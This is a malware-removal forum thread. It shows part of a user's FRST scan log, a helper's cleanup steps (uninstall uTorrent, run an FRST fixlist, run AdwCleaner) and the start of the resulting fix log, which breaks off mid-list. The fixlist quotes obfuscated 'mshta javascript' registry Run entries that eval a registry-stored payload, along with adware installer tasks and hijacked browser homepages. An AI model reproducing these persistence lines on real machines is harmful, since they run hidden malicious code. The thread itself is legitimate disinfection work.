Task: {21634F2A-F260-43A3-894C-EC3DC5C419B2} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {2F037E21-D0F8-4014-A901-829A7820AB5E} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {31718128-098F-4BB9-BAE0-DE20FCC657AB} - System32\Tasks\Installer_smknnodesk => C:\Users\PimpSlap\AppData\Local\Installer\Installsmknnodesk_32556\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {35F0F950-2529-40D1-8527-7A290FE06D3D} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-12-09] (Microsoft Corporation)
Task: {3D60D3FD-89B8-4AAD-9589-85D3B007D66E} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {3F7B4894-E007-452C-88F0-EC4B24416730} - System32\Tasks\RegCure Pro Startup => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe
Task: {401A3FFB-EE39-4E88-A83F-076E7ABA54E3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-19] (Adobe Systems Incorporated)
Task: {427AE940-8475-4C67-BA94-89C1E3D157D4} - System32\Tasks\ParetoLogic Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll" RunUns
Task: {4A0440C5-320B-40CC-B3F8-65DBB2C2D4FA} - System32\Tasks\{6C27EFA9-C11D-4DE8-9C38-B574A63BB94F} => pcalua.exe -a "C:\Program Files (x86)\Steam\SteamApps\common\Grand Theft Auto IV\Installers\vcredist_x86.exe" -d "C:\Program Files (x86)\Steam\SteamApps\common\Grand Theft Auto IV\Installers"
Task: {52523B24-79B7-42DF-9392-D0EA104B9ACF} - System32\Tasks\ParetoLogic Update Version3 => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe
Task: {571FFB71-819A-4C4F-A66B-2175AACA257B} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {5C3BB34F-123C-424F-BF94-9EBA1FB3095B} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {5D03BF7B-0AB8-4D9F-A00C-33FCF0A90476} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {6046CC50-8E8F-4EF6-8AD9-18EC12AD90C7} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {60E1C591-65B3-4B02-92AE-48C0906FAEE9} - System32\Tasks\ParetoLogic Update Version3_triggeronce => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe
Task: {6397674F-4357-4CE8-B742-050381F92FCA} - System32\Tasks\GoogleUpdateTaskMachineCore1d11368d9784eb7 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {63BA6AC1-A2A8-4A75-94AD-7B7BAF64C943} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {69CDE21F-8740-4D61-AA13-476D024D036A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {6C4FB60D-69AB-4C28-B212-CF26ECC5C71A} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {758061B9-8BA6-4117-A22D-3105225E5CDC} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {84634419-0B04-4937-9618-5EEA1B7D268E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {943759B5-D17E-4A51-8B43-11CA0ADE8492} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {9E37A41E-0B81-4185-B57D-D11D4514408A} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A16F7F04-77C4-4081-A28A-F42F5FFD3532} - System32\Tasks\{7E8CFA39-6414-4B94-BF78-7245A4BCF78E} => Chrome.exe hxxp://ui.skype.com/ui/0/7.7.0.103/en/abandoninstall?page=tsBing
Task: {A91E6011-C8AE-4509-9EE9-6DB4B2051670} - System32\Tasks\Installer_DSKB => C:\Users\PimpSlap\AppData\Local\Installer\InstallDSKB_27758\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {AE4C319A-2361-4BE1-8FBB-C8493C6F2372} - System32\Tasks\{486836BD-3952-4285-B823-2EC6E43B3FBB} => pcalua.exe -a "C:\Program Files (x86)\Sniper Elite 3\_CommonRedist\vcredist\2010\vcredist_x64.exe" -d "C:\Program Files (x86)\Sniper Elite 3\_CommonRedist\vcredist\2010"
Task: {AF90F3C7-403B-42CD-939C-E19079940338} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {AFA2FEAF-2590-4185-BBCE-17550071080F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {C1B0097B-7CEB-4A29-BC35-5A325EAB595D} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {C6ECE819-62EA-4DD7-8CD9-AB9DB52495AD} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C9DE9167-B167-4CA7-B58E-F0F750258194} - System32\Tasks\AdobeAAMUpdater-1.0-PimpSlap-PC-PimpSlap => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {D42682DB-910D-46BF-950F-584A6578B3A2} - System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
Task: {DABFC1BA-52F0-41D1-85D4-826EEBC6E4F2} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {DADB9295-D367-4867-B8FD-D4493B18DED1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {DD4EA7BC-A6CF-44FA-9A20-A3F44E219280} - System32\Tasks\GoogleUpdateTaskMachineUA1d11368d9c6141c => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {F0C7D7F1-F49D-4694-851A-E3EA51B481B5} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore1d11368d9784eb7.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d11368d9c6141c.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\ParetoLogic Registration3.job => C:\Windows\system32\rundll32.exeGC:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll
Task: C:\WINDOWS\Tasks\ParetoLogic Update Version3.job => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe
Task: C:\WINDOWS\Tasks\ParetoLogic Update Version3_triggeronce.job => c:\program files (x86)\common files\paretologic\uus3\Pareto_Update3.exe
Task: C:\WINDOWS\Tasks\RegCure Pro Startup.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe
Task: C:\WINDOWS\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 19:33 - 2015-07-09 19:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-09 21:08 - 2015-09-09 21:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-06-22 20:37 - 2015-06-22 20:37 - 00214528 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.PerformanceTuning.dll
2014-02-11 06:08 - 2014-02-11 06:08 - 00817152 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Device.dll
2014-02-11 06:08 - 2014-02-11 06:08 - 03650560 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Platform.dll
2015-09-09 21:08 - 2015-09-09 21:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-11 16:56 - 2015-08-11 16:55 - 00076152 _____ () C:\Windows\system32\PnkBstrA.exe
2015-10-11 18:31 - 2015-09-16 22:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-06-22 20:37 - 2015-06-22 20:37 - 00102400 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2015-10-11 18:31 - 2015-09-16 22:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-10-11 18:30 - 2015-09-16 21:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-09 19:13 - 2015-07-09 19:13 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-09 09:15 - 2015-11-24 20:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 09:15 - 2015-11-24 20:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 09:15 - 2015-11-24 20:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-11 18:31 - 2015-09-16 21:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-09 19:13 - 2015-09-09 21:08 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2015-08-24 05:56 - 2015-08-24 05:56 - 00039384 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2015-05-26 15:09 - 2015-05-26 15:09 - 00259584 _____ () C:\Program Files\Telestream\Wirecast\filters\WirecastVirtualCamera.ax
2015-12-09 15:28 - 2015-12-04 13:32 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\libglesv2.dll
2015-12-09 15:28 - 2015-12-04 13:32 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\PimpSlap:Heroes & Generals
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\google.com -> hxxps://www.google.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\mirillis.com -> hxxps://mirillis.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\sony.com -> sony.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PimpSlap\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\worldoftanks 7-13-2015 5-17-47 pm-429.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: AMD FUEL Service => 2
MSCONFIG\Services: Beard => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: Razer Game Scanner Service => 2
MSCONFIG\Services: ReflectService.exe => 2
MSCONFIG\Services: RzKLService => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: Raptr => C:\PROGRA~2\Raptr\RAPTRS~1.EXE --startup
HKLM\...\StartupApproved\Run: => "XboxStat"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "MyComGames"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\StartupApproved\Run: => "Razer Comms"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{F9CAC4A2-B9E3-4215-9857-2028E4423818}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Burstfire\Burstfire.exe
FirewallRules: [{A2B52FA7-4816-41C9-9E4A-B44BC5F2B3DD}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rainbow Six Siege - Closed Beta\RainbowSix.exe
FirewallRules: [{BF596D20-EE74-4C0E-900D-A1902AD2B340}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rainbow Six Siege - Closed Beta\RainbowSix.exe
FirewallRules: [{DCF04272-1FF1-49E4-88A4-BCED35B3073E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{33707DF8-9DA5-4A68-93FC-17DFDBF3A3B4}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{B8F64A4E-D387-451F-93D3-32CD9FD27350}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\AVA\NWZLauncher.exe
 
==================== Faulty Device Manager Devices =============
 
Name: Unknown USB Device (Device Descriptor Request Failed)
Description: Unknown USB Device (Device Descriptor Request Failed)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard USB Host Controller)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (12/10/2015 02:58:57 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program explorer.exe version 10.0.10240.16603 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 120c
 
Start Time: 01d1339c5bbfaa01
 
Termination Time: 0
 
Application Path: C:\Windows\explorer.exe
 
Report Id: 82bd26f0-9f91-11e5-8dd9-1c6f65a98371
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (12/10/2015 02:41:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: GameScannerService.exe, version: 1.0.6.2662, time stamp: 0x56030e8a
Faulting module name: KERNELBASE.dll, version: 10.0.10240.16384, time stamp: 0x559f3b2a
Exception code: 0xe0434352
Fault offset: 0x000b3e28
Faulting process id: 0xa24
Faulting application start time: 0xGameScannerService.exe0
Faulting application path: GameScannerService.exe1
Faulting module path: GameScannerService.exe2
Report Id: GameScannerService.exe3
Faulting package full name: GameScannerService.exe4
Faulting package-relative application ID: GameScannerService.exe5
 
Error: (12/10/2015 02:41:25 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: GameScannerService.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.BadImageFormatException
Stack:
   at Razer.GameScannerService.GameScannerService..ctor()
   at Razer.GameScannerService.Program.Main()
 
Error: (12/10/2015 06:10:30 AM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (27136) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (12/10/2015 06:10:30 AM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (27136) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (12/10/2015 06:10:20 AM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (27136) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (12/10/2015 06:10:20 AM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (27136) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (12/10/2015 06:10:09 AM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (27136) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (12/10/2015 06:10:09 AM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (27136) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (12/10/2015 06:09:59 AM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (27136) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
 
System errors:
=============
Error: (12/10/2015 05:13:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 05:09:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 05:05:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 05:01:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 04:57:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 04:53:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 04:49:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 04:45:12 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 03:24:01 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
Error: (12/10/2015 03:20:01 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
 
 
==================== Memory info =========================== 
 
Processor: AMD Phenom™ II X6 1100T Processor
Percentage of memory in use: 26%
Total physical RAM: 16381.55 MB
Available physical RAM: 12035.82 MB
Total Virtual: 32765.55 MB
Available Virtual: 28175.78 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:1862.92 GB) (Free:973.49 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive f: (Youtube & Extra) (Fixed) (Total:465.76 GB) (Free:429.15 GB) NTFS
Drive j: (Movies) (Fixed) (Total:1397.17 GB) (Free:1266 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1397.3 GB) (Disk ID: 00004C34)
Partition 1: (Not Active) - (Size=1397.2 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 000B90AB)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 0E584CAF)
Partition 1: (Active) - (Size=1862.9 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#5
BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Thanks. Please do the following.

 

Step#1 - Warnings
The Dangers of P2P Programs
IMPORTANT: I noticed that you have a P2P (Peer to Peer) file sharing program on your computer. I cannot stress highly enough the danger in using these types of programs. P2P programs are one of the major avenues of infection these days. The files downloaded with these programs are more than likely infected with trojans, malware, rootkits, etc.
You run the risk of getting an infection that can compromise your sensitive data, such as financial records, personal information, etc. That is just the infection aspect of using P2P programs. You also run the risk of possible arrest, fines, or in severe cases, jail time for illegal downloading of copyrighted material.
 
Here are some information sources about the dangers of P2P programs:
FBI - Peer to Peer Scams
USA Today Article on P2P Programs
File Sharing Infects 500,000 Computers
 
I very much recommend you uninstall this program from your machine. If not, you will likely be back needing help with your machine again. The risks of infections from content downloaded with P2P programs far outweigh any benefit of using them.
 
It is, of course, your choice as to whether or not you remove the program from your machine. It is my duty though, to point out how dangerous it is to use these programs. However, I must request that you do not use it while we are cleaning your machine.
 
Please uninstall the following Peer-to-Peer program(s): uTorrent

 

Step#2 - FRST Fix
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.
1. Download attached file and save it to the Desktop. Attached file: fixlist.txt
Note. It's important that both files, FRST64 and fixlist.txt, are in the same location or the fix will not work (in this case...the desktop).
2. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
3. Press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
4. When finished FRST64 will generate a log on the Desktop (Fixlog.txt). Please post the contents of it in your reply.

 

Step#3 - AdWCleaner
1. Please download AdwCleaner by Xplode onto your desktop.
2. Close all open programs and internet browsers.
3. Right-click on AdwCleaner.exe and select Run as administrator to run the tool. Click I agree if you agree with the terms of use.
4. Click on Scan.
5. After the scan is complete, click on "Cleaning".
6. Confirm each time with Ok.
7. Your computer will be rebooted automatically. A text file will open after the restart.
8. Please post the content of that logfile with your next answer.
9. If need be, you can also find the logfile at C:\AdwCleaner\AdwCleaner[C1].txt as well.

 

 

Items for your next post

1. FixLog.txt

2. AdwCleaner log



#6
jake1master

    Member

  • Topic Starter
  • Member
  • 10 posts

Fix result of Farbar Recovery Scan Tool (x64) Version:09-12-2015
Ran by PimpSlap (2015-12-10 19:32:47) Run:1
Running from C:\Users\PimpSlap\Desktop
Loaded Profiles: PimpSlap (Available Profiles: PimpSlap)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [WindApp] => "C:\Users\PimpSlap\AppData\Roaming\Store\WindApp\WindApp.exe" /winstartup
C:\Users\PimpSlap\AppData\Roaming\Store\WindApp
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Selection Tools] => "C:\Users\PimpSlap\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup
C:\Users\PimpSlap\AppData\Roaming\WTools
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**bfa63c00<*>] => mshta javascript:tg5Av9BK="F7FU0VZ6tm";Q2k=new%20ActiveXObject("WScript.Shell");TvtxAYj0="5EsUzy";nTa5r6=Q2k.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");MLUFn3l="dr9X";eval(nTa5r6);sKu0ZwI="RwVzRS (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**10548e12<*>] => mshta javascript:aRV1SL8ci="1Vhox";U1z3=new%20ActiveXObject("WScript.Shell");Kc5EZWrY="10ceYvbH";O4eIG=U1z3.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");pN6ujpZ6iw="cw";eval(O4eIG);jrwYec53i="SGxNZ (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
FF Homepage: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF Extension: No Name - C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\extensions\[email protected] [not found]
S2 NetTcpHandler; C:\Users\PimpSlap\AppData\Roaming\NetService\netservice.exe -start [X]
C:\Users\PimpSlap\AppData\Roaming\NetService
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}\InprocServer32 -> no filepath
Task: {31718128-098F-4BB9-BAE0-DE20FCC657AB} - System32\Tasks\Installer_smknnodesk => C:\Users\PimpSlap\AppData\Local\Installer\Installsmknnodesk_32556\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {A91E6011-C8AE-4509-9EE9-6DB4B2051670} - System32\Tasks\Installer_DSKB => C:\Users\PimpSlap\AppData\Local\Installer\InstallDSKB_27758\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {D42682DB-910D-46BF-950F-584A6578B3A2} - System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
EmptyTemp:
 
*****************
 
Restore point was successfully created.
[7864] C:\Windows\SysWOW64\regsvr32.exe => process closed successfully.
[7988] C:\Windows\SysWOW64\regsvr32.exe => process closed successfully.
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\WindApp => value removed successfully
"C:\Users\PimpSlap\AppData\Roaming\Store\WindApp" => not found.
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Selection Tools => value removed successfully
C:\Users\PimpSlap\AppData\Roaming\WTools => moved successfully
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**bfa63c00<*> => value removed successfully
